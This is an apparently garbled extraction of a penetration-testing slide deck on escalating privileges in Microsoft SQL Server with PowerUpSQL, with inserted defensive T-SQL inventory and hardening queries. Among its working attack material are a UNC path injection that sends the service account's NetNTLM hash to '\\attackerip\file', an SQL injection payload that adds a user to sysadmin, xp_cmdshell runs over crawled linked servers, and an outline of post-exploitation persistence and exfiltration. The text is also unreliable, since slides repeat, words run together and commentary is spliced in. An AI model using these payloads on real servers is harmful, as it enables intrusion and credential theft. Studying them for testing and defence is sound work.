Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql/
Escalating Privileges: Crawling Server Links
Function                 Description
Get-SQLServerLink        Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl   Crawls linked servers and supports SQL query and OS command execution
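The escalation described in this section depends on how each link maps local logins to a remote identity. As an added example (not from the slides or PowerUpSQL), the following T-SQL inventories the links on an instance with their login mappings, then flags the combination the diagram calls "DB Link with SA account": every local login, public included, mapped to one fixed remote login on a link that also allows remote procedure calls.

```sql
-- Inventory: one row per link and login mapping.
SELECT  s.name                    AS link_name,
        s.data_source,
        s.product,
        s.provider,
        s.is_data_access_enabled, -- 1 = OPENQUERY / four-part names work over this link
        s.is_rpc_out_enabled,     -- 1 = remote stored procedures (e.g. xp_cmdshell) can be called
        ll.uses_self_credential,  -- 1 = callers are passed through as themselves
        sp.name                   AS local_login,  -- NULL = mapping applies to all local logins
        ll.remote_name            AS fixed_remote_login
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS sp ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- Flag: links where all local logins (local_principal_id = 0) share one fixed remote login
-- and remote procedure calls are allowed. Anyone who can connect locally inherits that
-- remote identity, which is the crawl-and-escalate case this section describes.
SELECT  s.name AS link_name,
        s.data_source,
        ll.remote_name AS fixed_remote_login
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
  AND ll.local_principal_id = 0
  AND ll.uses_self_credential = 0
  AND s.is_rpc_out_enabled = 1;
```

Run it on every instance reached by a crawl, not just the first hop: a link that looks harmless on DB1 is what lets the next hop run under SA. Where a link does not need to call remote procedures, EXEC sp_serveroption with the 'rpc out' option set to 'false' removes the xp_cmdshell path while leaving queries working.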
Escalating Privileges: UNC Path Injection
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands
  BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
  RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016
  https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.
Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive.
Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges
OS Admin to SysAdmin
Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin
Approach              2000  2005  2008  2012  2014  2016
LSA Secrets            x     x     x     x     x     x
Local Administrator    x     x
LocalSystem            x     x     x
Process Migration      x     x     x     x     x     x
Token Stealing         x     x     x     x     x     x
Single User Mode             x     x     x     x     x
Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options:
Approach                                                      Common Tools
Access as Local Administrator                                 Management Studio, sqlcmd, and other native SQL client tools
Access as LocalSystem                                         Psexec, accessibility options, debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets  Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process   Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process    Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                              DBATools
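Both the shared-service-account section and the version table above come down to two facts about an instance: who holds sysadmin, and which identity the services run as. As an added example (not from the slides or PowerUpSQL), the following T-SQL answers both from inside the instance, and separately flags the two Windows principals that older versions made sysadmin by default. sys.dm_server_services is not present on the oldest versions in the table; the first and third queries work everywhere.

```sql
-- 1. Every member of the sysadmin role, with its principal type.
--    WINDOWS_GROUP members deserve a second look: group membership changes outside SQL Server.
SELECT  sp.name,
        sp.type_desc,        -- SQL_LOGIN, WINDOWS_LOGIN, WINDOWS_GROUP, CERTIFICATE_MAPPED_LOGIN, ...
        sp.is_disabled,
        sp.create_date
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r  ON r.principal_id  = rm.role_principal_id
JOIN sys.server_principals AS sp ON sp.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin'
ORDER BY sp.type_desc, sp.name;

-- 2. The account each SQL Server service runs as. A domain account here that is reused on
--    many instances is the "one account to rule them all" case: sysadmin on one box is
--    sysadmin on all of them. Virtual accounts and gMSAs do not share that blast radius.
SELECT  servicename,
        service_account,
        startup_type_desc,
        status_desc
FROM sys.dm_server_services;

-- 3. Defaults from the version table that should no longer be sysadmin on a current build:
--    BUILTIN\Administrators (2000/2005) and NT AUTHORITY\SYSTEM (2000 through 2008).
SELECT  sp.name,
        IS_SRVROLEMEMBER(N'sysadmin', sp.name) AS is_sysadmin
FROM sys.server_principals AS sp
WHERE sp.name IN (N'BUILTIN\Administrators', N'NT AUTHORITY\SYSTEM')
  AND IS_SRVROLEMEMBER(N'sysadmin', sp.name) = 1;
```

Collecting the output of query 2 across an estate and grouping by service_account gives the count of instances a single compromised service account would hand over, which is the number this section asks you to care about.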
Common Post Exploitation Activities
Post Exploitation Overview
1. Establish Persistence
   • SQL Server Layer: startup procedures, agent jobs, triggers, modified code
   • OS Layer: Registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
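The SQL Server layer persistence mechanisms listed under step 1 each leave a catalog footprint. As an added example (not from the slides or PowerUpSQL), the following T-SQL pulls them into one list with a modification timestamp, so a defender can diff the output against a known-good baseline or sort by date after an incident.

```sql
-- Startup procedures: live in master and run with every instance start.
SELECT  N'startup_procedure' AS kind,
        SCHEMA_NAME(p.schema_id) + N'.' + p.name AS item,
        p.modify_date
FROM master.sys.procedures AS p
WHERE OBJECTPROPERTY(p.object_id, 'ExecIsStartup') = 1

UNION ALL
-- Server-scoped DDL and logon triggers: fire on DDL events or on every login.
SELECT  N'server_trigger',
        t.name,
        t.modify_date
FROM sys.server_triggers AS t

UNION ALL
-- Enabled Agent jobs, with owner: scheduled code that survives restarts.
SELECT  N'agent_job',
        j.name + N' (owner: ' + ISNULL(SUSER_SNAME(j.owner_sid), N'?') + N')',
        j.date_modified
FROM msdb.dbo.sysjobs AS j
WHERE j.enabled = 1

UNION ALL
-- Job steps that leave T-SQL entirely and run OS commands or PowerShell.
SELECT  N'agent_job_step_os',
        j.name + N' / ' + s.step_name + N' [' + s.subsystem + N']',
        j.date_modified
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE s.subsystem IN (N'CmdExec', N'PowerShell')

ORDER BY modify_date DESC;
```

Database-scoped DDL triggers (sys.triggers with parent_class = 0) are per database and are not covered by the server-level views above; run that check in each database. "Modified code" from the slide is the hardest case to catch from the catalog alone, which is why the modify_date column matters: a procedure whose modify_date moved without a matching change ticket is the lead.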
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges: Impersonation (Stored Procedure and Trigger Creation Injection Issues)
• Use signed procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certificate
o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
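The seven steps above, carried out end to end, as an added example rather than code from the deck or from PowerUpSQL. The procedure reads sys.dm_exec_sessions, which needs VIEW SERVER STATE, and gets exactly that permission from a certificate login instead of inheriting everything the database owner can do. MyAppDb and MyAppUser follow the deck's example; the certificate and login names, the master key password and the export path are assumptions.

```sql
-- Added example (not from the deck or PowerUpSQL): a certificate-signed procedure that
-- needs VIEW SERVER STATE without EXECUTE AS OWNER or TRUSTWORTHY. Names, the password
-- and C:\Temp are assumptions; the service account must be able to write the .cer file.
USE MyAppDb;
GO
-- 1. The procedure, with NO EXECUTE AS clause. Without VIEW SERVER STATE a caller would
--    see only their own session in sys.dm_exec_sessions.
CREATE PROCEDURE dbo.sp_list_sessions
AS
BEGIN
    SET NOCOUNT ON;
    SELECT session_id, login_name, host_name, program_name
    FROM sys.dm_exec_sessions
    WHERE is_user_process = 1;
END
GO
-- 2. Database master key: protects the certificate's private key inside MyAppDb.
IF NOT EXISTS (SELECT 1 FROM sys.symmetric_keys WHERE name = '##MS_DatabaseMasterKey##')
    CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'Use-A-Long-Random-Password-Here-1!';
GO
-- 3. Certificate (with private key) in the same database as the module it will sign.
CREATE CERTIFICATE SessionReaderCert WITH SUBJECT = 'Signs dbo.sp_list_sessions';
GO
-- 4. Export the PUBLIC key only (no WITH PRIVATE KEY) so master can build a login from it,
--    then create the login. It can never connect; it exists only to hold permissions.
BACKUP CERTIFICATE SessionReaderCert TO FILE = 'C:\Temp\SessionReaderCert.cer';
GO
USE master;
GO
CREATE CERTIFICATE SessionReaderCert FROM FILE = 'C:\Temp\SessionReaderCert.cer';
CREATE LOGIN SessionReaderLogin FROM CERTIFICATE SessionReaderCert;
GO
-- 5. The one server-level permission the procedure needs, and nothing else.
GRANT VIEW SERVER STATE TO SessionReaderLogin;
GO
USE MyAppDb;
GO
-- 6. Signing binds the certificate (and so the login's permission) to this exact
--    procedure body. ALTER PROCEDURE drops the signature; re-run this after every change.
ADD SIGNATURE TO dbo.sp_list_sessions BY CERTIFICATE SessionReaderCert;
GO
-- 7. Let the application user run it. MyAppUser itself gains no other rights.
GRANT EXECUTE ON dbo.sp_list_sessions TO MyAppUser;
GO
-- Check: the signature is recorded on the module.
SELECT OBJECT_NAME(major_id) AS module, crypt_type_desc
FROM sys.crypt_properties
WHERE major_id = OBJECT_ID('dbo.sp_list_sessions');
-- Check from a real MyAppUser connection (not EXECUTE AS):
--   EXEC dbo.sp_list_sessions;                  -- all user sessions
--   SELECT COUNT(*) FROM sys.dm_exec_sessions;  -- 1: only the caller's own session
```

Two caveats matter in practice: the ADD SIGNATURE step has to be repeated after any ALTER PROCEDURE, and permissions carried by a signature do not flow into dynamic SQL executed inside the module, so a signed procedure that builds EXEC strings from caller input gains nothing from the certificate and still carries the injection risk shown on the next slide.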
Escalating Privileges: Impersonation (SQL Injection Example)
CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%' + @DbName + '%'' OR name=''tempdb'''
EXECUTE(@query)
END
GO
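What a caller sends to that procedure, and a parameterized rewrite, as an added example that is not from the deck. It assumes sp_sqli2 was created WITH EXECUTE AS OWNER in a TRUSTWORTHY database owned by a sysadmin login, as the preceding slides describe, and that MyAppUser has EXECUTE on it.

```sql
-- Added example: exploiting and then fixing the sp_sqli2 pattern. Assumes sp_sqli2 runs
-- WITH EXECUTE AS OWNER in a TRUSTWORTHY database owned by a sysadmin (the deck's setup).

-- 1. Attacker input. The first quote closes the LIKE pattern, the extra statement runs in
--    the owner's context, and the trailing comment discards the rest of the original query.
EXEC dbo.sp_sqli2 @DbName = 'x%'' OR 1=1; EXEC sp_addsrvrolemember ''MyAppUser'', ''sysadmin''; --';
-- @query as actually executed:
--   SELECT name FROM master..sysdatabases WHERE name like '%x%' OR 1=1;
--   EXEC sp_addsrvrolemember 'MyAppUser', 'sysadmin'; --%' OR name='tempdb'

-- 2. Verify from a NEW connection as MyAppUser:
--   SELECT IS_SRVROLEMEMBER('sysadmin');   -- 1

-- 3. Fixed version: no EXECUTE AS OWNER (sign the module instead if it needs extra
--    rights) and input bound as a parameter, never concatenated into the statement.
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName sysname
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @sql nvarchar(max) = N'SELECT name FROM master.sys.databases '
                               + N'WHERE name LIKE @pattern ESCAPE ''\'' OR name = N''tempdb'';';
    -- LIKE wildcards in the caller's input are escaped so they cannot widen the match either.
    DECLARE @pattern nvarchar(300) = N'%'
        + REPLACE(REPLACE(REPLACE(REPLACE(@DbName, N'\', N'\\'), N'%', N'\%'), N'_', N'\_'), N'[', N'\[')
        + N'%';
    EXEC sp_executesql @sql, N'@pattern nvarchar(300)', @pattern = @pattern;
END
GO
-- The same payload is now only a pattern value: nothing matches and nothing else runs.
EXEC dbo.sp_sqli2_fixed @DbName = 'x%'' OR 1=1; EXEC sp_addsrvrolemember ''MyAppUser'', ''sysadmin''; --';
```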
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1 SysAdmins can execute OS commands
2 OS commands run as the SQL Server service account
3 Service accounts have sysadmin privileges by default
4 Companies often use a single domain account to run hundreds of SQL Servers
5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Figure: Leveraging Shared MS SQL Server Service Accounts (build diagram)
Zones: Internet, DMZ, Intranet. Hosts: LRA, HVA, LVA, ADS. Ports 80 and 443; ports 1433 and 1434. Attacker: Captain Evil (PURE EVIL).
1 SQL Injection
2 Execute local command via xp_cmdshell
3 Access to HVA with shared domain service account; execute commands and gather data from other database servers via osql
Key: HVA = High Value Application, LVA = Low Value Application
Escalating Privileges
Crawling SQL Server Links
Escalating Privileges: Crawling SQL Server Links
What's a SQL Server link?
SQL Server links are basically persistent database connections for SQL Servers
Why should I care?
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT * FROM OpenQuery([SQLSERVER2], 'SELECT @@Version')
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Figure: Leveraging MS SQL Database links (build diagram)
Zones: Internet, DMZ, Intranet. Hosts: LRA, HVA, LVA, ADS, DB1. Ports 80 and 443; ports 1433 and 1434. Attacker: Captain Evil (PURE EVIL). Links shown: DB Link with Least Privileges, DB Link with SA account.
1 SQL Injection
2 Execute SQL queries and local commands on database servers via nested linked servers
Key: HVA = High Value Application, LVA = Low Value Application
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50% of environments we've seen
The max number of hops we've seen is 12
The max number of servers crawled is 226
Escalating Privileges: Crawling Server Links
Old Script
Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql/
Escalating Privileges: Crawling Server Links
Function                 Description
Get-SQLServerLink        Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl   Crawls linked servers and supports SQL query and OS command execution
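A manual version of what Get-SQLServerLink and Get-SQLServerLinkCrawl automate, written here as an added example rather than the deck's or PowerUpSQL's code: it lists the links defined on the current server, checks whose context each one runs in on the far side, follows a link through another link, and shows the RPC form used for stored procedures. SQLSERVER2 and SQLSERVER3 are placeholder link names.

```sql
-- Added example: manual link enumeration and a two-hop crawl. SQLSERVER2 and SQLSERVER3
-- are placeholder link names; xp_cmdshell must already be enabled on the far server.

-- 1. Links defined here. A non-NULL remote_name is a fixed remote login configured on
--    the link (frequently sa); NULL with uses_self_credential = 1 means the caller's own
--    Windows identity is forwarded instead.
SELECT s.name AS link_name,
       s.data_source,
       s.is_rpc_out_enabled,          -- 1 = EXEC ... AT [link] is allowed
       ll.remote_name,
       ll.uses_self_credential
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1;

-- 2. Who am I on the other end? OPENQUERY runs the inner text on SQLSERVER2 under the
--    link's login, not under the local caller, which is where the escalation comes from.
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT @@SERVERNAME AS server, SYSTEM_USER AS remote_login, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin');

-- 3. Second hop: the inner query itself calls OPENQUERY on SQLSERVER2, so the request to
--    SQLSERVER3 is made by SQLSERVER2 with SQLSERVER2's link credentials. Every hop doubles
--    the quoting, which is the main reason crawling is scripted rather than typed.
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT * FROM OPENQUERY([SQLSERVER3], ''SELECT @@SERVERNAME AS server, SYSTEM_USER AS remote_login'')');

-- 4. Enumerate the next set of links from the far side to decide where to crawl next.
SELECT * FROM OPENQUERY([SQLSERVER2], 'SELECT name, data_source FROM sys.servers WHERE is_linked = 1');

-- 5. The RPC form for stored procedures (requires is_rpc_out_enabled = 1 on the link).
--    The OS command runs as SQLSERVER2's service account if the link login is sysadmin there.
EXEC ('EXEC master..xp_cmdshell ''whoami''') AT [SQLSERVER2];
```

Step 2 is the check to run first on every link: a link whose remote login is sysadmin on the far side turns any local public-role user into a sysadmin there, regardless of how locked down the local instance is.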
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands: the server tries to reach the UNC path as its service account before the caller's missing BACKUP/RESTORE permission is enforced, so an SMB listener at attackerip receives the service account's NetNTLM authentication even though the command itself fails
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016
https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008
Escalating Privileges: UNC Path Injection
So in summary...
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default
Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
...what? It's self descriptive
Escalating Privileges
OS Admin to SysAdmin
Escalating Privileges: OS Admin to SysAdmin
Two things to know...
1 Different SQL Server versions can be abused in different ways
2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin
Approach               2000  2005  2008  2012  2014  2016
LSA Secrets            x     x     x     x     x     x
Local Administrator    x     x
LocalSystem            x     x     x
Process Migration      x     x     x     x     x     x
Token Stealing         x     x     x     x     x     x
Single User Mode             x     x     x     x     x
(Local Administrator: BUILTIN\Administrators is sysadmin by default only on 2000 and 2005; LocalSystem: NT AUTHORITY\SYSTEM is sysadmin by default through 2008)
Below are some options for leveraging that knowledge
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options
Approach                                                        Common Tools
Access as Local Administrator                                   Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem                                           Psexec, accessibility options, debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets    Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process     Metasploit, Empire, Python, PowerShell, C/C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process      Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                                DBATools
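A quick way to tell which rows of that table still apply to a given instance before choosing a tool, as an added example (not from the deck or PowerUpSQL). The first query needs only a login that can see the listed principals; sys.dm_server_services exists on 2008 R2 SP1 and later and needs VIEW SERVER STATE.

```sql
-- Added example: which 'OS admin to sysadmin' defaults does this instance still have?

-- 1. Are the local Administrators group or LocalSystem still sysadmin? BUILTIN\Administrators
--    is by default on 2000/2005 and NT AUTHORITY\SYSTEM through 2008; on later versions
--    both appear here only if someone added them back.
SELECT sp.name,
       sp.type_desc,
       sp.is_disabled,
       IS_SRVROLEMEMBER('sysadmin', sp.name) AS is_sysadmin
FROM sys.server_principals AS sp
WHERE sp.name IN (N'BUILTIN\Administrators', N'NT AUTHORITY\SYSTEM')
   OR sp.name LIKE N'NT SERVICE\MSSQL%';   -- per-service SID (2012+), always sysadmin

-- 2. Which account runs the engine? That is the identity LSA Secrets, process injection
--    and token theft hand you, and it is sysadmin on every version.
SELECT servicename, service_account, startup_type_desc
FROM sys.dm_server_services;

-- 3. Version, so the table's columns can be read against this instance.
SELECT SERVERPROPERTY('ProductVersion') AS version, SERVERPROPERTY('Edition') AS edition;
```

If query 1 returns no row for BUILTIN\Administrators and no row for NT AUTHORITY\SYSTEM, the "Access as Local Administrator" and "Access as LocalSystem" approaches are off the table and the remaining options all go through the service account from query 2.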
Common Post Exploitation Activities
Post Exploitation Overview
Common Post Exploitation Activities
1 Establish Persistence
• SQL Server Layer: startup procedures, agent jobs, triggers, modified code
• OS Layer: registry & file auto runs, tasks, services, etc.
2 Identify Sensitive Data
• Target large databases
• Locate transparently encrypted databases
• Search columns based on keywords and sample data
• Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Data
• All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
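The SQL Server-layer items under step 1 and the database-hunting items under step 2 reduce to a handful of catalog queries. The following is an added example (not from the deck or PowerUpSQL) that inventories the persistence points the list names and performs the keyword column search; the keyword list and the TOP (5) sampling are assumptions.

```sql
-- Added example: inventory SQL Server-layer persistence points and hunt sensitive columns.

-- 1a. Startup procedures: live in master and run as the service account on every start.
SELECT p.name, p.modify_date
FROM master.sys.procedures AS p
WHERE OBJECTPROPERTY(p.object_id, 'ExecIsStartup') = 1;

-- 1b. Server-scoped (logon / DDL) triggers, which fire for every login or DDL event.
SELECT name, type_desc, is_disabled, modify_date
FROM sys.server_triggers;

-- 1c. Agent jobs whose steps shell out or call xp_cmdshell / OLE automation.
SELECT j.name AS job_name, j.enabled, SUSER_SNAME(j.owner_sid) AS owner,
       s.step_name, s.subsystem, s.command
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell')
   OR s.command LIKE '%xp_cmdshell%'
   OR s.command LIKE '%sp_OACreate%';

-- 1d. DML/DDL triggers in the current database (the "modified code" case).
SELECT OBJECT_NAME(parent_id) AS parent, name, type_desc, is_disabled, modify_date
FROM sys.triggers;

-- 2a. Transparently encrypted databases (TDE) and database sizes to target.
SELECT d.name, d.is_encrypted, SUM(mf.size) * 8 / 1024 AS size_mb
FROM sys.databases AS d
JOIN sys.master_files AS mf ON mf.database_id = d.database_id
GROUP BY d.name, d.is_encrypted
ORDER BY size_mb DESC;

-- 2b. Keyword search over column names in the current database; sample_sql is the query
--     to run next against each hit before deciding whether the data is really sensitive.
DECLARE @keywords TABLE (kw sysname);
INSERT INTO @keywords VALUES ('password'), ('passwd'), ('ssn'), ('card'), ('credit'), ('account'), ('secret');
SELECT s.name AS schema_name, t.name AS table_name, c.name AS column_name, ty.name AS data_type,
       'SELECT TOP (5) ' + QUOTENAME(c.name) + ' FROM ' + QUOTENAME(s.name) + '.' + QUOTENAME(t.name) AS sample_sql
FROM sys.columns AS c
JOIN sys.tables  AS t  ON t.object_id = c.object_id
JOIN sys.schemas AS s  ON s.schema_id = t.schema_id
JOIN sys.types   AS ty ON ty.user_type_id = c.user_type_id
WHERE EXISTS (SELECT 1 FROM @keywords AS k WHERE c.name LIKE '%' + k.kw + '%')
ORDER BY s.name, t.name, c.name;
```

The same queries serve the defender: run 1a to 1d on a schedule and diff the output, since a new startup procedure, logon trigger or CmdExec job step is the SQL-layer equivalent of a new Run key.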
Escalating Privileges
Unauthenticated Domain User to SQL Login
Testing Login Access: Techniques
What credentials can I use to log into discovered SQL Servers?
Attacker Perspective                    Attack Technique
Unauthenticated                         Dictionary attacks using common user names and passwords
Unauthenticated                         Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account     Attempt to login using the current account
Testing Login Access: PowerUpSQL CMDs
What PowerUpSQL functions can I use to test for successful logins?
Attack Technique         PowerUpSQL Function
Dictionary Attack        Invoke-SQLAuditWeakLoginPw
Default Password Test    Invoke-SQLAuditDefaultLoginPw
2 Get the principal id for the sa account with "suser_id"
3 Use "suser_name" to get SQL logins using just the principal ID
4 Increment the number and repeat
select n [id], SUSER_NAME(n) [user_name]
from (select top 10000 row_number() over(order by t1.number) as N
      from master..spt_values t1 cross join master..spt_values t2) a
where SUSER_NAME(n) is not null
Code gifted from @mobileck. Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
